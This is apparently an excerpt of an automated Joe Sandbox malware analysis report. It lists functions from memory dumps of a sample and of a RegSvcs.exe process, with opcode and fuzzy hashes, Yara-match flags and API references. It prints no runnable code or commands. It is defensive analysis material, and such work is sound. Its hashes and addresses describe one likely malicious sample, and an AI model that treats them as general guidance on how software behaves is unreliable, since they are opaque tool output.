Opcode Fuzzy Hash: 08b2010391aa1469b3296683de65d071d6c3a931f4f66fc9f535d231326a5d55
Instruction Fuzzy Hash: 3DF09AF1D28209EFCB40DFB4D48619CBBF0EB1A201F1488E6D844E3201E2385A81DF42

Function 0725BAD4 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04e36ff93ad701260dd2525154db10816c5e20dc37453f5db6d62e6ae213f0f7
Instruction ID: 64a5899dbb2370cb6a96e0921169e47288fe564d10595052f04ec4f280aeeff2
Opcode Fuzzy Hash: 04e36ff93ad701260dd2525154db10816c5e20dc37453f5db6d62e6ae213f0f7
Instruction Fuzzy Hash: B1F0FEF4E29205CFCB10CFA4D585AAEB7B5BF0A701F209419E80AAB355D771ED01CB04

Function 0725C540 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98037ce518dd12e73137f755241c3f592e9f408ed1ea0713f0a458af9b7215ec
Instruction ID: 64ecedc653f0997db63c34a3ed22f96a8f02a5920e46910e6f1cc5f9ee73041e
Opcode Fuzzy Hash: 98037ce518dd12e73137f755241c3f592e9f408ed1ea0713f0a458af9b7215ec
Instruction Fuzzy Hash: D3F0B7B0D1430A9FDB44DFA9C841ABEBBF4AB48300F1045A9D918E7240E77595418BA0

Function 072581EF Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a0420628f11643d3d5f6c85e4acf112e453b656d3810a7909544668a5df2c63
Instruction ID: 1e98babb4349c1e4e3f3d8a72212ade022bfabbe778861271e84a42f8bd9caee
Opcode Fuzzy Hash: 9a0420628f11643d3d5f6c85e4acf112e453b656d3810a7909544668a5df2c63
Instruction Fuzzy Hash: E0F06572614109BFDF08DF98DC4189EBFBAEF44260B10C07AE808D7320E671D9518B90

Function 0725B090 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c8b6a19e4d1f5dbab37331e9fc5f8cca1e904e319198ad549298922d907499a
Instruction ID: e873a8bbba02941ea754ce0a70e0388c2581815a6ef1e038993c873075648289
Opcode Fuzzy Hash: 2c8b6a19e4d1f5dbab37331e9fc5f8cca1e904e319198ad549298922d907499a
Instruction Fuzzy Hash: BDE02CF102638A8FC2210AB0B81E6F0BFA8C702224F001082F86C87802D9280994CBA3

Function 0725B1A5 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b179bbb9529ed4837ac2c098ba8f7a1b6214c53920ecef7dbe083dffea26811
Instruction ID: c5ca2269f100e37c7559b0a76d5b30fae3ec02e44f025bf153c5d3684d0bbb13
Opcode Fuzzy Hash: 5b179bbb9529ed4837ac2c098ba8f7a1b6214c53920ecef7dbe083dffea26811
Instruction Fuzzy Hash: 2DE08C7264A318CFDB218F28ED52798BB79FF82200F0002E7C84997221DB305E59CF40

Function 072530D1 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b87f6d023aaf5af7a34625ed6e81e447a9a09df9654f60a7110e61e9f108ceb
Instruction ID: 93f496d710c4cd1cde1fed598e2f1e458a79e814b360c3296e95a07d62702c98
Opcode Fuzzy Hash: 2b87f6d023aaf5af7a34625ed6e81e447a9a09df9654f60a7110e61e9f108ceb
Instruction Fuzzy Hash: 20D012B7519295EFC7029BA4D8018C5BFB5AE5615430980D7D9848F122D1229A26C7E2

Function 0725C4E2 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1198a556095c35fc52ffccc05962c5274647cb40e8886036070967befd1ea07a
Instruction ID: db1d9e0a27b31aaa021334b18b32fbef6b4b8bd72bd5f60e3a77be6157bcd2a8
Opcode Fuzzy Hash: 1198a556095c35fc52ffccc05962c5274647cb40e8886036070967befd1ea07a
Instruction Fuzzy Hash: 2DE0E5B4E1020AEFD740CFA8C50479EBBF1BB08304F118865C418E7261EBB486018F10

Function 0725C4E8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 881939eac5bb02fa9cc877488df783f9ce3f0d5d6a88b49acb7b8c9ca3c74936
Instruction ID: 542704b4d4bf2268b72f92da9e1c4828068aaddf13a221ff0afec1d9a74d12ab
Opcode Fuzzy Hash: 881939eac5bb02fa9cc877488df783f9ce3f0d5d6a88b49acb7b8c9ca3c74936
Instruction Fuzzy Hash: 90E092B4D5020A9FDB40EFB9C909A6EBBF0AB08710F1185A9D419E7211E7B496458F91

Function 0725D21C Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 368b0264d6ec343ffb8d9ab31f4e39fa44b61204f2e414f525fad12c248f1e46
Instruction ID: f03da8f6d6b26e6d306a8e1db005944659ef64812c5b8b54c672e0707fa1416f
Opcode Fuzzy Hash: 368b0264d6ec343ffb8d9ab31f4e39fa44b61204f2e414f525fad12c248f1e46
Instruction Fuzzy Hash: 7FF0C2B4D1025ACBCB24CF64D8897EDBBB5FB48301F1088E6E80EA2254EB745AC5DF50

Function 0725C5E0 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07b667dfa3216e5482d05a9adcb8f2ab105a8a6dc1fce4744c959fcff45f6ee1
Instruction ID: 2df7e358dd59895fcc6bbb17022d9047d1bbf131d76ef0c1bc6ea38990edfac0
Opcode Fuzzy Hash: 07b667dfa3216e5482d05a9adcb8f2ab105a8a6dc1fce4744c959fcff45f6ee1
Instruction Fuzzy Hash: 62D0127212020E9E4B41EED4F800C527BEDFB14710740C432E904C7020E631E464D751

Function 072581B7 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f73bfb7eb5fca45e6a8ea42b1eba923f5b4feefb006ad580ab9ea2e0117188b9
Instruction ID: a13b318b32f24e3d31d11a20e1570420fd15bda56ee27cec32a6ac533020e362
Opcode Fuzzy Hash: f73bfb7eb5fca45e6a8ea42b1eba923f5b4feefb006ad580ab9ea2e0117188b9
Instruction Fuzzy Hash: CCC012C28B93C0B9D302122044127812FA05E72208B078593C94442092821A5127C367

Function 07252909 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c8a8701c2ee7ee4697797db0e00a32f14913a6aef9ee43b0052943dc26695ba
Instruction ID: f3ec0a05311f7b303a43d450e0560160aff31514f04d95795b8b741675582d84
Opcode Fuzzy Hash: 0c8a8701c2ee7ee4697797db0e00a32f14913a6aef9ee43b0052943dc26695ba
Instruction Fuzzy Hash: 40D022954AD3C098CB0313300AA942ABF10AAA370074ADCCAC2C80601A80708812D3A7

Function 0725B0A0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86dbf86b1189f20ea85f10c8ad29d116ffb3415dab2a9faa4077a91c599036d8
Instruction ID: d8a448c2407d1bd4818cdcedafb3a4385ca94725ac6d1043645b216317bf432f
Opcode Fuzzy Hash: 86dbf86b1189f20ea85f10c8ad29d116ffb3415dab2a9faa4077a91c599036d8
Instruction Fuzzy Hash: 6CC04CB00527058FD2146BA9B80F768BBA8E701316F445020B55D414519E785494CB56

Function 0725D3AA Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 669ebcd5c9e9e4ca5be451a7614297b1e7056a9157475dc11088f76e50db89b7
Instruction ID: b8e17e491dbb6377bfef43e1f5d2a1b2365146a53d62a321b3d8568ede83496d
Opcode Fuzzy Hash: 669ebcd5c9e9e4ca5be451a7614297b1e7056a9157475dc11088f76e50db89b7
Instruction Fuzzy Hash: 8AC04CB2429647CBC6401A14945C1E5F768EA16332B159395D8395A0D6962A09916AD0

Function 07252918 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8c57b1ec8073d96c3e8917f8502cbbaceeb7a3b8875af9497344b50f8676d6
Instruction ID: 297e5e4acb37d94287f984b5c0768d39c8d664379a21c9a1c0597a8f302d7d46
Opcode Fuzzy Hash: 5f8c57b1ec8073d96c3e8917f8502cbbaceeb7a3b8875af9497344b50f8676d6
Instruction Fuzzy Hash: 83B012B52F4140E2E4006368498182AE800EBB2700F01EC117B8B500548CB2C469E62B

Non-executed Functions

Function 07255928 Relevance: 5.6, Strings: 4, Instructions: 562COMMON

Download Yara Rule

Strings

:, xrefs: 07255BA7
4'^q, xrefs: 07255CE4
~, xrefs: 07255B46
pbq, xrefs: 07255DAD

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID: 4'^q$:$pbq$~
API String ID: 0-999388165
Opcode ID: 2ae2ae7f1190005040da85c5e5a6073cb5e93c8f3dae89a7eff2a06c4a899602
Instruction ID: 2b25fb484c5a71ca5e4af2aca0e72feba83c9c8a82c975944987c2b24894b6db
Opcode Fuzzy Hash: 2ae2ae7f1190005040da85c5e5a6073cb5e93c8f3dae89a7eff2a06c4a899602
Instruction Fuzzy Hash: 574213B5A10219DFDB15CFA9C984B99BBB2FF49300F1580E9E909AB261D731ED91CF10

Function 0725F660 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edc999bdf786ca11d7d323a70ac4347d556527b3a98a1499b32525dd616cb357
Instruction ID: f7d38109ed6b758489821a3718a6bb4b1faa860ae6c54861ba64016003293e48
Opcode Fuzzy Hash: edc999bdf786ca11d7d323a70ac4347d556527b3a98a1499b32525dd616cb357
Instruction Fuzzy Hash: 7AE10DB4E102199FCB14DFA9C6809AEFBF2FF49304F248159E814AB356DB31A941CF61

Function 0725FA98 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8176fe28300ce86ec6668863471ad13d50c3b809ad92cd3d6ad026a677da207f
Instruction ID: 37ea0b130386546350374d5154a0d999daefabce3e27d5e7e672b1978d627c48
Opcode Fuzzy Hash: 8176fe28300ce86ec6668863471ad13d50c3b809ad92cd3d6ad026a677da207f
Instruction Fuzzy Hash: 4CE10FB4E142198FCB14DFA9C6809AEFBF2FF49304F248169D914AB356DB31A941CF61

Function 073F0478 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792940305.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb04ed495451d8d7a86823a11a104eab91c25c495673fdf829aac7cb3bd2008a
Instruction ID: 9b8dd8eec2ae586ba47378733983e4f9717b4cc2426cc88014421201f4ba8b3e
Opcode Fuzzy Hash: cb04ed495451d8d7a86823a11a104eab91c25c495673fdf829aac7cb3bd2008a
Instruction Fuzzy Hash: C3E1FEB4E142198FDB14DFA9C5809AEFBF2FF89304F248159D518AB356DB31A941CFA0

Function 073F1B20 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792940305.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f57ff85d336f4621848123dee035e8ea74004dba881aae3dd83439603ef6e83
Instruction ID: a8ec2499f7f464922d70d32f66d0a404015d88f3176fa1e4110f40d03fa42f42
Opcode Fuzzy Hash: 9f57ff85d336f4621848123dee035e8ea74004dba881aae3dd83439603ef6e83
Instruction Fuzzy Hash: F3E1FCB4E10219CFDB14DFA9D5809AEFBF2BF49304F248169E918AB355DB31A941CF60

Function 073F0040 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792940305.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f71dbfcfd74802f6505340b4a42f4b281a3e0d86e9758671423b4051ca7f88
Instruction ID: 61c1c49c5d6b47a5a870cc940f33e43774c30e66a3768860941c839af802564f
Opcode Fuzzy Hash: 44f71dbfcfd74802f6505340b4a42f4b281a3e0d86e9758671423b4051ca7f88
Instruction Fuzzy Hash: 28E11DB4E142198FDB14DFA9C5809AEFBF2FF49304F248169D918AB356DB31A941CF60

Function 04EBE12C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1781677660.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4eb0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b95658dc37f71a8ab9cf7a0d8447401a1c39273bce2e388027033f2a2f93b89a
Instruction ID: 5d3008b2e7397b3c35465ff3e868f61673c8ecf95100ddc80bc53ea993741642
Opcode Fuzzy Hash: b95658dc37f71a8ab9cf7a0d8447401a1c39273bce2e388027033f2a2f93b89a
Instruction Fuzzy Hash: 9BA16A32A00219DFDF05DFB4C8448DEB7B2FF85304B2595AAE845AB265DB35E946CB80

Function 073F0006 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792940305.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d320e99e311deaeb8d76441d70a254ecd436e2a55659e3cfebe79029b8fad242
Instruction ID: 2b29eaaf13b893f8b4c42ca7c01d3c46416cae806b615c35398e4c261cbbc3b9
Opcode Fuzzy Hash: d320e99e311deaeb8d76441d70a254ecd436e2a55659e3cfebe79029b8fad242
Instruction Fuzzy Hash: E15160B4E042598FDB15CFA9C5405AEFBF2AF8A304F24C1AAD508AB316DB355E41CF61

Function 073F0468 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792940305.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f0000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48d9687b2e0289f55e4d975d9ba1af197711451e339011224417f12d498c2aef
Instruction ID: d21ad72c733115d243074913c35026496b15970e3e6957fc73edac15a6fdb380
Opcode Fuzzy Hash: 48d9687b2e0289f55e4d975d9ba1af197711451e339011224417f12d498c2aef
Instruction Fuzzy Hash: 2B510BB4E142198FDB14CFA9C5805AEFBF2BF89304F248169D558AB316DB319942CFA0

Function 0725FA8A Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85aa6d1711be188688ca05709c837238d895b1e7d5f6a03b52afe2af3ab80b6e
Instruction ID: 6c8be55718e6660024f7086013e5596eaf58cd926003dfeca89acc902c65cdd8
Opcode Fuzzy Hash: 85aa6d1711be188688ca05709c837238d895b1e7d5f6a03b52afe2af3ab80b6e
Instruction Fuzzy Hash: CB511EB4E142198BDB14DFA9C6805AEFBF2FF89304F24C169D818AB315DB319941CFA1

Function 07255917 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792319545.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7250000_fHkdf4WB7zhMcqP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52fbb9cef34daa2207033133eb7630d7a92a200626a5247c9392d07c7ba50a61
Instruction ID: 4064bfc80bb32747e20337cbac6b6c4f91a1772463d390b875593691551b8e8b
Opcode Fuzzy Hash: 52fbb9cef34daa2207033133eb7630d7a92a200626a5247c9392d07c7ba50a61
Instruction Fuzzy Hash: E1419AB1E116198BDB58CF6BC9407DAFBF3AFC9210F14C1A5D808AB215EB305A968F51

Analysis Process: RegSvcs.exePID: 7304, Parent PID: 6904COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	5.5%
Signature Coverage:	8.6%
Total number of Nodes:	128
Total number of Limit Nodes:	9

Executed Functions

Function 00417C83 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417CF5

Memory Dump Source

Source File: 00000008.00000002.1895730632.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: a906ef9f31b45e18ae2e58ca7185c19609d2c3edd97fcc1d2ed25c7f5900b66e
Instruction ID: 7d5d4216ee7ed411ad3e08a9cd56a70be608fd2d703d7a1eb10c5648433f788b
Opcode Fuzzy Hash: a906ef9f31b45e18ae2e58ca7185c19609d2c3edd97fcc1d2ed25c7f5900b66e
Instruction Fuzzy Hash: CA0121B5E4020DBBDF10DBE5DC42FDEB3789B54308F0081AAE90997241F635EB588BA5

Function 0042CAC3 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CAF7

Memory Dump Source

Source File: 00000008.00000002.1895730632.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 10087827329fb40a5d604f6313aa19ac2f1ec0e91e3ba1001f9476195abcf75b
Instruction ID: 35eafcc178508431e30db7319518aaf39038e224ffb4693b8fec406774bfbc40
Opcode Fuzzy Hash: 10087827329fb40a5d604f6313aa19ac2f1ec0e91e3ba1001f9476195abcf75b
Instruction Fuzzy Hash: B4E04F312006187BD220BE6ADC01F97776CDFC5714F00441AFA08A7282D675B9108BA8

Function 017F2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 017F2B6A

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 27199e0b87f9cb9208dc518cbdc659320de9da924df583a1e6046a2ccbf1b63d
Instruction ID: 39e5044da14377ec3eeab279f2d348a0f2de4bae42395bda99bb211cfe31901d
Opcode Fuzzy Hash: 27199e0b87f9cb9208dc518cbdc659320de9da924df583a1e6046a2ccbf1b63d
Instruction Fuzzy Hash: 6F90026160280447414671584814616400A97E1301B55C021E20185D4DC5258AD56226

Function 017F2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F2DFA

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d46f43e03a073fb2ee82efc7326a08d2d686db0013c2351aa62c840a252b3103
Instruction ID: 1dea0d6e83d09e767c2ca66a0fb2ec03541f0e37fd4a3220214cd6349363efb7
Opcode Fuzzy Hash: d46f43e03a073fb2ee82efc7326a08d2d686db0013c2351aa62c840a252b3103
Instruction Fuzzy Hash: 8290023160180857D15271584904707000997D1341F95C412A142859CDD6568BD6A222

Function 017F2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F2C7A

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 33f53350778bca0a8a8a2866e8d9ad3621be110301a59f8eea94bfdfc2c924a9
Instruction ID: 9e7c22aff079084dbe5ebcbcdf943353f62f616db7bf92e3b17a0f5d1134bcc1
Opcode Fuzzy Hash: 33f53350778bca0a8a8a2866e8d9ad3621be110301a59f8eea94bfdfc2c924a9
Instruction Fuzzy Hash: DE90023160188C46D1517158880474A000597D1301F59C411A542869CDC6958AD57222

Function 017F35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F35CA

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3fa59dd017ac628186501af29686a076fbdcb0d4130c5ece3e87d5c01fc5d26
Instruction ID: 751d752ae877c753cd6593c60e76bd20503a963e39bb696491df726c41a16d66
Opcode Fuzzy Hash: a3fa59dd017ac628186501af29686a076fbdcb0d4130c5ece3e87d5c01fc5d26
Instruction Fuzzy Hash: EC900231A0590846D14171584914706100597D1301F65C411A14285ACDC7958BD566A3

Function 00414461 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

6-G0991eL2, xrefs: 004145D0, 004145DC, 004145ED
6-G0991eL2, xrefs: 004145E4, 004145E7

Memory Dump Source

Source File: 00000008.00000002.1895730632.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID: 6-G0991eL2$6-G0991eL2
API String ID: 0-3551662889
Opcode ID: c3e1c229c48a84605f33b7896b48254ee027a305d9d036ef423dc4ff8e2cd480
Instruction ID: 8492aad5297b048c7318a72cfb3a1835f9f7304ffefbd6f11f558c4aba7e4f78
Opcode Fuzzy Hash: c3e1c229c48a84605f33b7896b48254ee027a305d9d036ef423dc4ff8e2cd480
Instruction Fuzzy Hash: 86319A759083959BD721DF60C8427CEBF74FFC1724F24429ED6849B182E33559478789

Function 00414558 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(6-G0991eL2,00000111,00000000,00000000), ref: 004145DD

Strings

6-G0991eL2, xrefs: 004145D0, 004145DC, 004145ED
6-G0991eL2, xrefs: 004145E4, 004145E7

Memory Dump Source

Source File: 00000008.00000002.1895730632.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 6-G0991eL2$6-G0991eL2
API String ID: 1836367815-3551662889
Opcode ID: 335f62dec5b8dcaaf0cfa722cf2679fe12a3a9a603bf88a491bf3782bf23f1e9
Instruction ID: 348a73b7778984348b52f2efd7c8483fa1188105f8e1262b7f2f0aa5e58e3f96
Opcode Fuzzy Hash: 335f62dec5b8dcaaf0cfa722cf2679fe12a3a9a603bf88a491bf3782bf23f1e9
Instruction Fuzzy Hash: D4110C71E40218B7DB21A7D19C43FDF7B789F85B50F048059FA047B2C1E6B89A0647EA

Function 00414563 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

